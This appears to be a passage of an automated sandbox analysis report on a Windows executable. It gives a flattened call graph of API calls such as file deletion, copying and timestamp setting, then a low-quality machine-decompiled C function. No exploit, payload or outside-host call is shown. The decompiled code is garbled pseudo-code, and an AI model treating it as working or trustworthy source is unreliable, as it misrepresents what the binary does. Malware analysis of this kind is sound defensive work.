shared_ptr 56 API calls 56335->56336 56337 140007b26 __initmbctable 56336->56337 56338 1400850dc GetUserNameW 56339 14003a191 56342 140094390 56339->56342 56343 1400943e0 56342->56343 56344 140005700 107 API calls 56343->56344 56351 14009442b 56343->56351 56362 14009445e 56344->56362 56346 140094665 56347 140007a40 _RunAllParam 46 API calls 56346->56347 56348 140094693 56347->56348 56349 140007a40 _RunAllParam 46 API calls 56348->56349 56350 14009469d 56349->56350 56352 140007a40 _RunAllParam 46 API calls 56350->56352 56368 1400700a0 100 API calls 3 library calls 56351->56368 56353 1400946a7 56352->56353 56369 140013ae0 46 API calls _RunAllParam 56353->56369 56356 140094639 56356->56351 56357 140094651 56356->56357 56367 140011370 57 API calls shared_ptr 56357->56367 56360 140005700 107 API calls 56360->56362 56362->56346 56362->56351 56362->56356 56362->56360 56364 140079bd0 98 API calls 56362->56364 56365 140011b10 98 API calls 56362->56365 56366 140010f30 97 API calls 56362->56366 56364->56362 56365->56362 56366->56362 56367->56346 56368->56346 56370 1400801e0 56371 140080212 56370->56371 56372 140011960 95 API calls 56371->56372 56374 140080236 56372->56374 56373 140080316 56374->56373 56375 14008025b 56374->56375 56376 14008034d 56374->56376 56377 140062190 95 API calls 56375->56377 56378 140014530 111 API calls 56376->56378 56391 140080267 56377->56391 56379 140080365 56378->56379 56380 14008036a 56379->56380 56381 140080380 56379->56381 56382 14000fc40 46 API calls 56380->56382 56383 140062190 95 API calls 56381->56383 56384 14008030e 56382->56384 56385 14008038d 56383->56385 56388 140007a40 _RunAllParam 46 API calls 56384->56388 56386 14001823c 45 API calls 56385->56386 56396 1400803b7 56386->56396 56387 1400802ba 56389 140062190 95 API calls 56387->56389 56388->56373 56390 1400802d4 56389->56390 56469 140040ec0 GetFileAttributesW 56390->56469 56391->56387 56392 140062190 95 API calls 56391->56392 56392->56387 56394 1400802f1 shared_ptr 56394->56384 56395 140080322 56394->56395 56397 140062190 95 API calls 56395->56397 56399 140062190 95 API calls 56396->56399 56398 14008032f 56397->56398 56471 140059e40 74 API calls _flush 56398->56471 56401 140080444 56399->56401 56416 140040c40 56401->56416 56402 140080342 56402->56373 56402->56384 56404 140080467 56405 140040f30 3 API calls 56404->56405 56406 140080474 56405->56406 56407 1400804c0 56406->56407 56409 140062190 95 API calls 56406->56409 56408 140007a40 _RunAllParam 46 API calls 56407->56408 56410 1400804c8 56408->56410 56411 14008048f 56409->56411 56414 14003ef90 82 API calls 56410->56414 56422 140061900 56411->56422 56414->56373 56415 14000fc40 46 API calls 56415->56407 56417 140040c5f _flush 56416->56417 56418 14001823c 45 API calls 56417->56418 56420 140040c83 56417->56420 56419 140040cc2 56418->56419 56421 14001823c 45 API calls 56419->56421 56420->56404 56421->56420 56423 14006191f _flush 56422->56423 56424 14004f560 GetSystemTimeAsFileTime 56423->56424 56425 14006197d 56424->56425 56426 140019e98 81 API calls 56425->56426 56427 140061996 56426->56427 56428 140061a8d 56427->56428 56429 1400619be 56427->56429 56431 1400614b0 90 API calls 56428->56431 56430 1400614b0 90 API calls 56429->56430 56432 1400619c3 56430->56432 56433 140061a51 56431->56433 56434 14001823c 45 API calls 56432->56434 56454 1400619c7 56432->56454 56435 140019a28 _fread_nolock 59 API calls 56433->56435 56433->56454 56439 1400619fb 56434->56439 56436 140061ab0 56435->56436 56437 140019a28 _fread_nolock 59 API calls 56436->56437 56438 140061ac8 56437->56438 56440 140019a28 _fread_nolock 59 API calls 56438->56440 56442 14001823c 45 API calls 56439->56442 56441 140061ae7 56440->56441 56443 140019a28 _fread_nolock 59 API calls 56441->56443 56442->56433 56444 140061afa 56443->56444 56445 140019a28 _fread_nolock 59 API calls 56444->56445 56446 140061b1a 56445->56446 56447 140019a28 _fread_nolock 59 API calls 56446->56447 56448 140061b2d 56447->56448 56449 140019a28 _fread_nolock 59 API calls 56448->56449 56450 140061b40 56449->56450 56451 140019a28 _fread_nolock 59 API calls 56450->56451 56452 140061b53 56451->56452 56472 14003ef50 GetTempPathW GetTempFileNameW 56452->56472 56454->56410 56454->56415 56455 140061c45 56456 140019694 82 API calls 56455->56456 56457 140061c5b 56456->56457 56458 140061c61 DeleteFileW 56457->56458 56461 140061cf2 CopyFileW 56457->56461 56464 140061c75 56457->56464 56458->56454 56460 140019a28 _fread_nolock 59 API calls 56465 140061b63 56460->56465 56461->56458 56462 140061d21 DeleteFileW 56461->56462 56473 14003eed0 CreateFileW 56462->56473 56466 140059110 90 API calls 56464->56466 56465->56454 56465->56455 56465->56460 56467 140018ce4 79 API calls 56465->56467 56468 140061ce7 56466->56468 56467->56465 56468->56458 56468->56462 56470 140040ecf 56469->56470 56470->56394 56471->56402 56472->56465 56474 14003ef32 56473->56474 56475 14003ef17 SetFileTime CloseHandle 56473->56475 56474->56454 56475->56474 56476 1400877e0 56477 140011960 95 API calls 56476->56477 56478 140087816 56477->56478 56479 14008788d 56478->56479 56480 140087864 56478->56480 56512 140075ea0 56479->56512 56481 140007a40 _RunAllParam 46 API calls 56480->56481 56493 14008786c std::exception_ptr::_Current_exception 56481->56493 56593 1400624f0 56512->56593 56594 1400032e0 shared_ptr 56 API calls 56593->56594 56595 1400624fe CharLowerBuffW 56594->56595 56602 140074e60 56603 140062160 95 API calls 56602->56603 56604 140074e8b 56603->56604 56605 14000fd50 shared_ptr 56 API calls 56604->56605 56606 140074ec0 56605->56606 56607 140011960 95 API calls 56606->56607 56608 140074eec 56607->56608 56609 140072750 56 API calls 56608->56609 56610 140074eff 56609->56610 56611 140013120 57 API calls 56610->56611 56612 140074f0c std::exception_ptr::_Current_exception 56611->56612 56613 140078d60 56614 140062190 95 API calls 56613->56614 56615 140078d7c 56614->56615 56623 14005a0d0 56615->56623 56617 140078d84 56618 140078d88 GetLastError 56617->56618 56619 140078daa 56617->56619 56620 14000fc40 46 API calls 56618->56620 56621 140078da2 56620->56621 56622 140007a40 _RunAllParam 46 API calls 56621->56622 56622->56619 56624 1400151d0 57 API calls 56623->56624 56625 14005a0f6 56624->56625 56626 140040ec0 GetFileAttributesW 56625->56626 56627 14005a100 56626->56627 56628 14001823c 45 API calls 56627->56628 56629 14005a144 FindFirstFileW 56628->56629 56630 14005a1d6 56629->56630 56633 14005a163 56629->56633 56631 14005a1d9 FindClose 56630->56631 56631->56617 56632 14005a1bc FindNextFileW 56632->56633 56633->56630 56633->56632 56634 14005a1ac DeleteFileW 56633->56634 56634->56631 56634->56632 56635 140011ea0 56638 140011d40 56635->56638 56639 140011d70 56638->56639 56641 140011d7d 56639->56641 56642 140011db7 56639->56642 56643 140011dfc 56639->56643 56677 140011dfa 56639->56677 56640 140011d89 DefWindowProcW 56659 140011d9a 56640->56659 56641->56640 56688 140012ad0 Shell_NotifyIconW _fread_nolock 56641->56688 56645 140011e14 56642->56645 56646 140011dbc 56642->56646 56680 140011c70 56643->56680 56647 140037f78 56645->56647 56648 140011e1a 56645->56648 56649 140011dc5 56646->56649 56650 140038026 56646->56650 56651 1400141e0 7 API calls 56647->56651 56654 140011e21 SetTimer RegisterWindowMessageW 56648->56654 56655 140011e67 56648->56655 56656 140011dd1 56649->56656 56657 140038002 56649->56657 56653 1400141e0 7 API calls 56650->56653 56651->56659 56661 140038052 56653->56661 56654->56659 56662 140011e53 CreatePopupMenu 56654->56662 56663 140037f20 56655->56663 56664 140011e70 KillTimer 56655->56664 56665 140011ddd 56656->56665 56666 140037fde 56656->56666 56692 140070fd0 68 API calls _fread_nolock 56657->56692 56660 140037faa 56689 1400129a0 65 API calls _fread_nolock 56660->56689 56670 140001c40 254 API calls 56661->56670 56662->56659 56672 140037f41 MoveWindow 56663->56672 56673 140037f25 56663->56673 56687 140012ad0 Shell_NotifyIconW _fread_nolock 56664->56687 56665->56641 56667 140011de5 56665->56667 56666->56640 56691 140044370 56 API calls shared_ptr 56666->56691 56690 14007aba0 78 API calls _fread_nolock 56667->56690 56668 140038019 56668->56640 56676 140037fd8 56668->56676 56670->56677 56672->56659 56673->56641 56674 140037f2e SetFocus 56673->56674 56674->56659 56676->56659 56677->56640 56678 140011e88 PostQuitMessage 56678->56659 56681 140011c84 _fread_nolock 56680->56681 56682 140011d2a 56680->56682 56693 140010e00 56681->56693 56682->56659 56684 140011cf6 KillTimer SetTimer 56684->56682 56685 140011cb4 56685->56684 56686 140033369 Shell_NotifyIconW 56685->56686 56686->56684 56687->56678 56688->56660 56689->56677 56690->56676 56691->56677 56692->56668 56694 140010e17 56693->56694 56695 140010f10 std::exception_ptr::_Current_exception 56693->56695 56696 140011880 56 API calls 56694->56696 56695->56685 56697 140010e31 56696->56697 56698 140033240 LoadStringW 56697->56698 56699 140010e40 56697->56699 56701 140033262 56698->56701 56700 1400107e0 shared_ptr 56 API calls 56699->56700 56702 140010e54 56700->56702 56703 140012600 56 API calls 56701->56703 56704 140010e61 56702->56704 56705 140033279 56702->56705 56712 140010e7f _fread_nolock 56703->56712 56704->56701 56706 140010e6e 56704->56706 56716 1400117b0 56 API calls 2 library calls 56705->56716 56715 1400117b0 56 API calls 2 library calls 56706->56715 56708 14003328a 56710 1400332a5 56708->56710 56708->56712 56717 1400117b0 56 API calls 2 library calls 56710->56717 56714 140010ef3 Shell_NotifyIconW 56712->56714 56713 1400332b8 56714->56695 56715->56712 56716->56708 56717->56713 56718 14000559f 56721 140010ff0 56718->56721 56720 1400055aa 56722 140011220 107 API calls 56721->56722 56723 14001101f 56722->56723 56724 1400397a2 56723->56724 56725 140011049 56723->56725 56727 1400111a6 56723->56727 56750 1400700a0 100 API calls 3 library calls 56724->56750 56728 140011128 56725->56728 56744 14001106d 56725->56744 56727->56720 56728->56727 56729 140011184 56728->56729 56730 1400040d0 56 API calls 56728->56730 56731 1400040d0 56 API calls 56729->56731 56730->56728 56732 140011196 56731->56732 56746 140012d30 254 API calls _RunAllParam 56732->56746 56734 1400111c4 56747 140011370 57 API calls shared_ptr 56734->56747 56736 1400111d8 56738 140007a40 _RunAllParam 46 API calls 56736->56738 56737 140039744 56748 1400700a0 100 API calls 3 library calls 56737->56748 56739 1400111e5 56738->56739 56742 140007a40 _RunAllParam 46 API calls 56739->56742 56741 140011220 107 API calls 56741->56744 56742->56727 56743 140039792 56749 140013ae0 46 API calls _RunAllParam 56743->56749 56744->56734 56744->56737 56744->56741 56744->56743 56746->56727 56747->56736 56748->56743 56750->56727

                                                                                                                                                              Executed Functions

                                                                                                                                                              Function 0000000140006080 Relevance: 68.2, APIs: 44, Instructions: 2152COMMONCrypto
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 28%
                                                                                                                                                              			E00000001140006080(signed long long __ebx, void* __ebp, long long __rcx, void* __rdx, signed int* __r8, signed long long __r9, signed int __r10, void* __r11) {
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* __r12;
				void* __r13;
				void* _t400;
				signed int _t417;
				signed int _t422;
				intOrPtr _t424;
				signed char _t429;
				intOrPtr _t439;
				signed char _t441;
				signed int _t452;
				signed int _t453;
				signed int _t455;
				signed int _t457;
				signed int _t458;
				signed int _t460;
				signed int _t461;
				signed int _t462;
				signed long long _t466;
				void* _t467;
				signed int _t472;
				intOrPtr _t497;
				void* _t526;
				void* _t529;
				void* _t560;
				void* _t569;
				void* _t570;
				void* _t577;
				void* _t596;
				void* _t603;
				signed long long _t703;
				signed short* _t704;
				signed long long _t708;
				long long _t709;
				signed long long* _t712;
				signed long long _t713;
				signed long long _t717;
				signed short* _t718;
				long long _t721;
				signed long long _t722;
				signed int* _t723;
				signed long long _t724;
				intOrPtr _t725;
				long long _t728;
				signed long long* _t729;
				intOrPtr _t730;
				signed long long _t731;
				long long _t734;
				long long _t738;
				void* _t756;
				intOrPtr* _t759;
				signed long long _t762;
				signed long long _t763;
				long long _t764;
				signed long long _t768;
				signed short** _t769;
				long long _t770;
				signed long long _t771;
				intOrPtr _t776;
				intOrPtr _t777;
				intOrPtr _t778;
				void* _t779;
				intOrPtr* _t780;
				intOrPtr* _t782;
				intOrPtr _t783;
				intOrPtr* _t786;
				void* _t790;
				signed long long _t805;
				long long _t821;
				intOrPtr* _t827;
				intOrPtr _t834;
				intOrPtr* _t840;
				intOrPtr _t841;
				void* _t848;
				intOrPtr* _t869;
				signed long long _t870;
				long long _t873;
				intOrPtr _t876;
				intOrPtr _t877;
				intOrPtr* _t882;
				intOrPtr* _t889;
				void* _t893;
				signed long long _t897;
				intOrPtr _t898;
				void* _t900;
				intOrPtr* _t901;
				signed long long _t902;
				signed long long _t903;
				void* _t906;
				signed int* _t907;
				signed long long _t908;
				signed long long _t909;
				signed long long _t913;
				intOrPtr _t914;
				intOrPtr* _t915;
				long long _t916;
				signed long long _t917;
				long long _t918;
				void* _t920;
				signed long long _t921;
				intOrPtr* _t924;
				signed long long _t925;
				void* _t927;
				void* _t928;
				intOrPtr _t932;
				signed long long _t934;
				intOrPtr _t935;
				intOrPtr _t939;
				intOrPtr _t941;
				signed long long _t943;
				signed long long* _t946;
				long long _t949;
				void* _t950;
				signed short* _t951;
				intOrPtr* _t953;
				void* _t957;
				signed long long _t959;
				void* _t961;
				long long _t962;
				intOrPtr* _t964;
				WCHAR* _t967;
				signed long long* _t970;
				signed long long* _t972;
				intOrPtr* _t973;

				_t943 = __r9;
				 *((long long*)(_t927 + 0x20)) = __r9;
				 *((long long*)(_t927 + 8)) = __rcx;
				_t928 = _t927 - 0x148;
				r10d =  *__r8;
				_t962 = __rcx;
				_t946 =  *((intOrPtr*)( *((intOrPtr*)(__rdx + 8)) + __r10 * 8));
				_t703 =  *_t946;
				E00000001140016A44(_t400,  *_t703);
				_t921 = _t703;
				 *(_t928 + 0x80) = _t703;
				_t7 = _t703 + 1; // 0x1
				_t790 = _t7;
				if (_t790 == 0) goto 0x40036490;
				 *(_t928 + 0x88) = _t790 + 0x00000007 & 0xfffffff8;
				_t704 =  <  ? 0xffffffff : _t703;
				E00000001140016ED8(_t704, _t704);
				_t14 = _t921 + 2; // 0x2
				_t951 = _t704;
				 *(_t928 + 0x78) = _t704;
				E00000001140016710(_t467, _t790, _t704,  *_t703, _t921 + _t14);
				E00000001140016ED8(_t704, _t704);
				_t907 = _t704;
				if (_t907 == 0) goto 0x4003649a;
				 *_t907 = 1;
				 *(_t928 + 0x90) = _t907;
				if ( *((intOrPtr*)(_t962 + 0x230)) == 0) goto 0x40037dd0;
				if ( *_t907 - 1 > 0) goto 0x400364a2;
				CharUpperBuffW(_t967);
				if ( *((intOrPtr*)(_t962 + 0x228)) != 0) goto 0x40036511;
				_t759 =  *((intOrPtr*)(_t962 + 0x218));
				if (_t759 == 0) goto 0x40037dd0;
				_t932 =  *((intOrPtr*)(_t759 + 8));
				if (_t932 != _t921) goto 0x400071da;
				if (_t932 == 0) goto 0x400061ba;
				_t869 =  *_t759;
				_t526 =  *_t869 - ( *_t951 & 0x0000ffff);
				if (_t526 != 0) goto 0x400071da;
				_t870 = _t869 + 2;
				if (_t526 != 0) goto 0x400061a0;
				 *_t907 =  *_t907 + 0xffffffff;
				if (_t526 != 0) goto 0x400061cf;
				0x40016a60(_t906, _t920, _t756);
				0x40016a60();
				if (_t759 == 0) goto 0x40037dda;
				_t497 =  *((intOrPtr*)(_t759 + 0x24));
				 *(_t928 + 0x70) =  *(_t759 + 0x28);
				r8d = _t870 + 1;
				 *(_t928 + 0xa8) = _t921;
				 *(_t928 + 0xb0) = _t921;
				r11d =  *((short*)( *((intOrPtr*)( *((intOrPtr*)(__rdx + 8)) + _t870 * 8)) + 0xa));
				 *__r8 = r8d;
				 *((intOrPtr*)(_t928 + 0xe8)) =  *((intOrPtr*)(_t962 + 0x23c));
				 *((intOrPtr*)(_t928 + 0x30)) = 0;
				 *(_t928 + 0x38) = 1;
				 *(_t928 + 0x40) = _t921;
				 *((long long*)(_t928 + 0xc8)) = 0x400a2478;
				 *((long long*)(_t928 + 0xa0)) = 0x4009e730;
				 *(_t928 + 0xb8) = _t921;
				 *(_t928 + 0xd0) = _t921;
				 *(_t928 + 0xd8) = _t921;
				 *(_t928 + 0xe0) = _t921;
				if ( *((short*)( *((intOrPtr*)( *((intOrPtr*)(__rdx + 8)) + (_t932 - 1) * 8)) + 8)) != 0x47) goto 0x4003656a;
				r8d = r8d + 1;
				 *((intOrPtr*)(_t928 + 0x50)) = _t497;
				 *(_t928 + 0x68) = __ebx;
				 *(_t928 + 0x48) = r11d;
				 *(_t928 + 0x98) = 0;
				r10d = 0;
				 *__r8 = r8d;
				 *(_t928 + 0x198) = r8d;
				r9d =  *__r8;
				_t708 =  *((intOrPtr*)(__rdx + 8));
				_t529 =  *((short*)( *((intOrPtr*)(_t708 + _t943 * 8)) + 8)) - 0x47;
				if (_t529 >= 0) goto 0x400062cc;
				 *__r8 = _t943 + 1;
				goto 0x400062b0;
				if (_t529 == 0) goto 0x40036661;
				if (_t529 != 0) goto 0x40036645;
				if (r10d != 0) goto 0x40036653;
				r12d =  *__r8;
				_t57 =  &(_t951[0]); // 0x1
				 *__r8 = _t57;
				if (__ebx -  *0x400c7f10 > 0) goto 0x40036669;
				if (__ebx <= 0) goto 0x40036669;
				_t873 = ( *(_t759 + 0x20) << 5) +  *0x400c7f70;
				 *((long long*)(_t928 + 0xc0)) = _t873;
				 *((intOrPtr*)(_t928 + 0x4c)) = 3;
				r9d = 0;
				 *(_t928 + 0x1a0) = 0;
				if (_t497 <= 0) goto 0x4000653e;
				 *((intOrPtr*)(_t928 + 0x54)) = 0;
				if (r8d - r12d >= 0) goto 0x40006535;
				r9d = r9d + 1;
				dil = 0;
				 *(_t928 + 0x1a0) = r9d;
				_t805 =  *((intOrPtr*)( *((intOrPtr*)(_t873 + 8)) + _t708 * 8));
				if ( *((short*)(_t805 + 8)) == 0) goto 0x40036671;
				_t709 =  *((intOrPtr*)(__rdx + 8));
				if ( *((short*)( *((intOrPtr*)(_t709 + _t805 * 8)) + 8)) == 0x33) goto 0x40006387;
				dil = 0;
				_t762 =  *(_t928 + 0xd8);
				if (_t762 == _t921) goto 0x400071ec;
				E00000001140016ED8(_t709,  *((intOrPtr*)(_t709 + _t805 * 8)));
				r9d = 0;
				if (_t709 == 0) goto 0x400366b2;
				 *_t709 = dil;
				_t763 = _t762 + 1;
				 *((long long*)( *(_t928 + 0xd0) + _t763 * 8 - 8)) = _t709;
				 *(_t928 + 0xd8) = _t763;
				if (dil != 0) goto 0x400366ba;
				if ( *(_t928 + 0x40) != 0) goto 0x400367ec;
				_t417 =  *(_t928 + 0x38);
				if (_t417 == 8) goto 0x40036802;
				if (_t417 == 0xa) goto 0x40036826;
				if (_t417 == 5) goto 0x40036844;
				if (_t417 == 0xb) goto 0x40036854;
				if (_t417 == 0xc) goto 0x40036872;
				_t908 =  *(_t928 + 0xb0);
				 *(_t928 + 0x38) = 1;
				 *((intOrPtr*)(_t928 + 0x30)) = 0;
				if (_t908 == _t921) goto 0x4000725f;
				_t895 =  *(_t928 + 0xa8);
				E00000001140016ED8(_t709,  *(_t928 + 0x40));
				if (_t709 == 0) goto 0x40036a93;
				_t472 =  *(_t928 + 0x38);
				_t764 = _t709;
				 *((long long*)(_t709 + 0x10)) = 0;
				 *(_t709 + 8) = _t472;
				if (_t472 != 1) goto 0x40036890;
				 *_t764 =  *((intOrPtr*)(_t928 + 0x30));
				 *((long long*)( *(_t928 + 0xa8) + _t908 * 8)) = _t764;
				_t909 = _t908 + 1;
				_t934 = _t928 + 0x198;
				 *(_t928 + 0x20) = r12d;
				 *(_t928 + 0xb0) = _t909;
				if (E00000001140005700(_t709,  *((intOrPtr*)(_t928 + 0x190)),  *((intOrPtr*)(_t928 + 0x190)), __rdx, _t934,  *((intOrPtr*)(_t895 + _t908 * 8)), _t961, _t957) != 0) goto 0x40036617;
				_t876 =  *((intOrPtr*)(_t928 + 0xc0));
				if ( *((short*)( *((intOrPtr*)( *((intOrPtr*)(_t876 + 8)) + _t921 * 8)) + 8)) == 0x41) goto 0x40036a9a;
				r8d =  *(_t928 + 0x198);
				if (r8d == r12d) goto 0x4000652d;
				if ( *((short*)( *((intOrPtr*)( *((intOrPtr*)(__rdx + 8)) + _t934 * 8)) + 8)) != 0x40) goto 0x400365c2;
				_t422 = _t934 + 1;
				if (_t422 == r12d) goto 0x400365c2;
				 *(_t928 + 0x198) = _t422;
				r8d = _t422;
				_t712 =  *((intOrPtr*)(_t876 + 8));
				if ( *((short*)(_t712[_t921] + 8)) != 0x40) goto 0x4000650e;
				r9d =  *(_t928 + 0x1a0);
				_t424 =  *((intOrPtr*)(_t928 + 0x54)) + 1;
				if (_t424 -  *((intOrPtr*)(_t928 + 0x50)) >= 0) goto 0x40006535;
				 *((intOrPtr*)(_t928 + 0x54)) = _t424;
				goto 0x40006344;
				r9d =  *(_t928 + 0x1a0);
				r11d =  *(_t928 + 0x48);
				_t466 =  *(_t928 + 0x68);
				if (r9d -  *(_t928 + 0x70) < 0) goto 0x400365a8;
				if (r9d -  *((intOrPtr*)(_t928 + 0x50)) > 0) goto 0x400365a8;
				if (r8d != r12d) goto 0x400365a8;
				r14d =  *((intOrPtr*)(_t928 + 0x50));
				 *(_t928 + 0x60) = _t466;
				 *(_t928 + 0x58) = _t909;
				if (_t466 < 0) goto 0x40036b0b;
				_t560 =  *0x400c69f9 - sil; // 0x0
				if (_t560 != 0) goto 0x40036b14;
				E00000001140016ED8(_t712, _t712[_t921]);
				if (_t712 == 0) goto 0x40036bce;
				 *_t712 = _t909;
				_t970 = _t712;
				_t712[1] =  *(_t928 + 0x60);
				 *(_t928 + 0x70) = _t712;
				if ( *(_t928 + 0x60) < 0) goto 0x40036b46;
				if ( *(_t928 + 0x58) != 0) goto 0x40036b4e;
				 *_t712 = _t909;
				_t713 =  *0x400c69f0; // 0x0
				r9d =  *(_t928 + 0x1a0);
				_t970[2] = _t713;
				 *0x400c69f0 = _t970;
				 *0x400c69e8 =  *0x400c69e8 + 1;
				if ( *(_t928 + 0x58) != 0) goto 0x40036bdb;
				if (r14d - 1 < 0) goto 0x40006ae7;
				_t768 = _t909;
				 *(_t928 + 0x98) = _t768;
				_t877 =  *((intOrPtr*)( *((intOrPtr*)(_t928 + 0xc0)) + 8));
				 *(_t928 + 0x80) = _t909;
				 *(_t928 + 0x88) = _t909;
				 *(_t928 + 0x90) = _t909;
				 *((intOrPtr*)(_t928 + 0x54)) = 0;
				r10d = 0;
				 *(_t928 + 0x48) = 1;
				 *(_t928 + 0x78) = 0x4009c1d8;
				 *((intOrPtr*)(_t928 + 0x62)) = r10w;
				 *(_t928 + 0x60) = r11w;
				r13d = r10d;
				if ( *((intOrPtr*)( *((intOrPtr*)(_t877 + 0xa004e0ec0)) + 8)) == r10w) goto 0x40036c50;
				if (1 - r9d > 0) goto 0x400371b3;
				asm("inc ecx");
				if ( *((intOrPtr*)( *((intOrPtr*)( *(_t928 + 0xd0) + _t768 * 8)))) != r10b) goto 0x40036c90;
				_t717 =  *(_t928 + 0xa8);
				_t964 =  *((intOrPtr*)(_t717 + _t768 * 8));
				_t953 =  *((intOrPtr*)( *((intOrPtr*)(_t877 + _t717 * 8))));
				_t569 =  *0x400c69e8 - _t946; // 0x0
				if (_t569 == 0) goto 0x40036cd1;
				_t570 =  *0x400c69f9 - r10b; // 0x0
				if (_t570 != 0) goto 0x40036cf0;
				if ( *_t970 == _t946) goto 0x400067ac;
				_t429 =  *0x400c8880; // 0x1
				bpl = 0;
				if ((_t429 & 0x00000001) == 0) goto 0x40036cfe;
				 *0x400c8878 = _t946;
				 *0x400c8870 = _t946;
				_t769 =  *_t970;
				_t935 =  *((intOrPtr*)(_t953 + 8));
				_t718 = _t769[1];
				if (_t935 == 0) goto 0x40036d2b;
				if (_t718 == 0) goto 0x40036d34;
				if (_t935 - _t718 < 0) goto 0x40036d52;
				if (_t935 == 0) goto 0x40036d4a;
				_t577 =  *((intOrPtr*)( *_t953)) - ( *( *_t769) & 0x0000ffff);
				if (_t577 != 0) goto 0x4000674b;
				if (_t577 != 0) goto 0x40006730;
				goto 0x40036d4a;
				if (_t577 < 0) goto 0x40036d42;
				if (1 < 0) goto 0x40036d67;
				if (1 <= 0) goto 0x40036e10;
				if (_t769[7] != 0) goto 0x40036dc2;
				 *0x1400C8878 =  *((intOrPtr*)( *_t970 + 0x30));
				 *0x1400C8870 =  *((intOrPtr*)( *_t970 + 0x38));
				_t721 =  *0x400c8878; // 0x0
				 *((long long*)( *_t970 + 0x30)) = _t721;
				_t821 =  *_t970;
				_t722 =  *0x400c8870; // 0x31a44d0
				 *(_t821 + 0x38) = _t722;
				if (bpl != 0) goto 0x40036e18;
				r13d = r13d & 0x0000ff00;
				E00000001140016ED8(_t722, _t821);
				if (_t722 == 0) goto 0x40036e52;
				_t897 = _t722;
				 *(_t722 + 8) = _t921;
				 *((long long*)(_t722 + 0x10)) = _t821;
				_t723 =  <  ? 0xffffffff : _t722;
				E00000001140016ED8(_t723, _t723);
				_t172 = _t921 + 4; // 0x4
				 *_t897 = _t723;
				 *_t723 = 0;
				E00000001140016ED8(_t723, _t723);
				if (_t723 == 0) goto 0x40036e4a;
				 *_t723 = 1;
				 *(_t897 + 0x18) = _t723;
				if (_t897 == _t953) goto 0x40006852;
				_t724 =  *(_t897 + 0x18);
				if ( *_t724 - 1 > 0) goto 0x40036e5e;
				_t770 =  *((intOrPtr*)(_t953 + 8));
				 *((long long*)(_t897 + 8)) = _t770;
				_t177 = _t770 + 1; // 0x48
				if ( *((intOrPtr*)(_t897 + 0x10)) - _t177 < 0) goto 0x40036e89;
				E00000001140016710(_t172,  *((intOrPtr*)(_t897 + 0x10)) - _t177,  *_t897,  *_t953,  *((intOrPtr*)(_t897 + 8)) +  *((intOrPtr*)(_t897 + 8)) + 2);
				 *(_t897 + 0x20) = r13d;
				E00000001140016ED8(_t724,  *_t897);
				if (_t724 == 0) goto 0x40037060;
				_t771 = _t724;
				_t439 =  *((intOrPtr*)(_t964 + 8));
				 *((intOrPtr*)(_t771 + 8)) = _t439;
				 *(_t771 + 0x10) = _t921;
				if (_t439 == 1) goto 0x40006add;
				if (_t439 != 4) goto 0x40036ec7;
				E00000001140016ED8(_t724,  *_t897);
				if (_t724 == 0) goto 0x40037058;
				_t882 =  *((intOrPtr*)(_t964 + 0x10));
				 *_t724 =  *_t882;
				 *((long long*)(_t724 + 8)) =  *((intOrPtr*)(_t882 + 8));
				 *((long long*)(_t724 + 0x10)) =  *((intOrPtr*)(_t882 + 0x10));
				_t827 =  *((intOrPtr*)(_t882 + 0x18));
				 *((long long*)(_t724 + 0x18)) = _t827;
				 *_t827 =  *_t827 + 1;
				 *(_t771 + 0x10) = _t724;
				 *(_t897 + 0x28) = _t771;
				 *(_t897 + 0x38) = _t921;
				 *(_t897 + 0x30) = _t921;
				_t959 =  *_t970;
				if (_t959 == 0) goto 0x400072c7;
				_t441 =  *0x400c8880; // 0x1
				if ((_t441 & 0x00000001) == 0) goto 0x40037068;
				r15d = 0;
				 *0x400c8878 = _t970;
				 *0x400c8870 = _t970;
				_t939 =  *((intOrPtr*)(_t897 + 8));
				_t725 =  *((intOrPtr*)(_t959 + 8));
				if (_t939 == 0) goto 0x4003708b;
				if (_t725 == 0) goto 0x40037094;
				if (_t939 - _t725 < 0) goto 0x400370b1;
				if (_t939 == 0) goto 0x400370a9;
				_t596 =  *( *_t897) - ( *( *_t959) & 0x0000ffff);
				if (_t596 != 0) goto 0x40006951;
				if (_t596 != 0) goto 0x40006936;
				goto 0x400370a9;
				if (_t596 < 0) goto 0x400370a2;
				if (1 < 0) goto 0x400370c6;
				if (1 <= 0) goto 0x4000697b;
				_t203 = _t959 + 0x38; // 0x38
				if ( *(_t959 + 0x38) != 0) goto 0x40037118;
				_t913 = _t203 | 0xffffffff;
				 *((long long*)(0x1400c8878)) =  *((intOrPtr*)(_t959 + 0x30));
				 *((long long*)(0x1400c8870)) =  *(_t959 + 0x38);
				_t728 =  *0x400c8878; // 0x0
				 *((long long*)(_t959 + 0x30)) = _t728;
				_t729 =  *0x400c8870; // 0x31a44d0
				 *(_t959 + 0x38) = _t729;
				_t941 =  *((intOrPtr*)(_t897 + 8));
				_t730 =  *((intOrPtr*)(_t959 + 8));
				if (_t941 == 0) goto 0x4003715a;
				if (_t730 == 0) goto 0x40037163;
				if (_t941 - _t730 < 0) goto 0x4003717f;
				if (_t941 == 0) goto 0x40037178;
				asm("o16 nop [eax+eax]");
				_t603 =  *( *_t897) - ( *( *_t959) & 0x0000ffff);
				if (_t603 != 0) goto 0x400069fb;
				if (_t603 != 0) goto 0x400069e0;
				goto 0x40037178;
				if (_t603 < 0) goto 0x40037171;
				if (1 < 0) goto 0x40037194;
				if (1 <= 0) goto 0x400371ab;
				_t731 =  *0x400c8870; // 0x31a44d0
				 *(_t897 + 0x30) = _t959;
				 *(_t897 + 0x38) = _t731;
				 *(_t959 + 0x38) = _t731;
				r14d =  *((intOrPtr*)(_t928 + 0x50));
				 *( *(_t928 + 0x70)) = _t897;
				if ( *((short*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t928 + 0xc0)) + 8)) + _t731 * 8)) + 8)) == 0x41) goto 0x40037284;
				 *((intOrPtr*)(_t928 + 0x4c)) =  *((intOrPtr*)(_t928 + 0x4c)) + 2;
				 *(_t928 + 0x98) =  *(_t928 + 0x98) + 1;
				if ( *(_t928 + 0x60) - 0x30 >= 0) goto 0x400372b5;
				 *(_t928 + 0x78) = 0x4009c1d8;
				if ( *(_t928 + 0x88) != 0) goto 0x400372e0;
				 *(_t928 + 0x88) = _t913;
				0x40016a60();
				if ( *(_t928 + 0x48) + 1 - r14d > 0) goto 0x40006ae7;
				_t972 =  *0x400c69f0; // 0x0
				r9d =  *(_t928 + 0x1a0);
				 *(_t928 + 0x70) = _t972;
				goto 0x40006615;
